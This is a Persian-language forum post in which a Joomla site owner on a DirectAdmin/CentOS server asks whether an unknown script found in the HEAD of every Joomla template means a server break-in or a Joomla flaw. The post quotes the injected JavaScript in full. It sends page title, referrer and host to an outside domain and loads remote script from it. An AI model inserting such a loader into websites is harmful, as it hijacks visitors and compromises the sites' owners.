قرار گرفتن اسکریپت ناشناخته در سایت
من یک سرور دایرکت ادمین دارم و یک هاست ایجاد کردم و داخل اون یک سری سایت با جوملا درست کردم.
چند روز پیش یک کد مشکوک جاوا اسکریپت توی HEAD قالب سایتم دیدم که تحقیق کردم دیدم ویروسی هست.
این کد قبلاً توی قالب نبوده و تازه اضافه شده.
کل سایتهایی که با جوملا داشتم همگی این کد در قسمت HEADشون قرار گرفته.
سایتهایی که با جوملا نبودن این مشکل رو نداشتن و کدی داحلشون اضافه نشده بود.
حالا سوالی که من دارم اینه آیا فردی وارد هاست یا سرورم شده و این کد رو قرار داده در صفحات سایتم؟
یا اینکه نه باگ یا نقص مربوط به جوملاست که این اتفاق براش پیش افتاده؟
لطفاً راهنمایی کنید من دقیقاً چه کارهایی الان میتونم انجام بدم که امنیت سرور بالاتر برهکد HTML:<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.vermessung-stuetz.de/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Direct Admin
Cent OS
APache
SuPHP
CSF Firewall
پاسخ با نقل قول
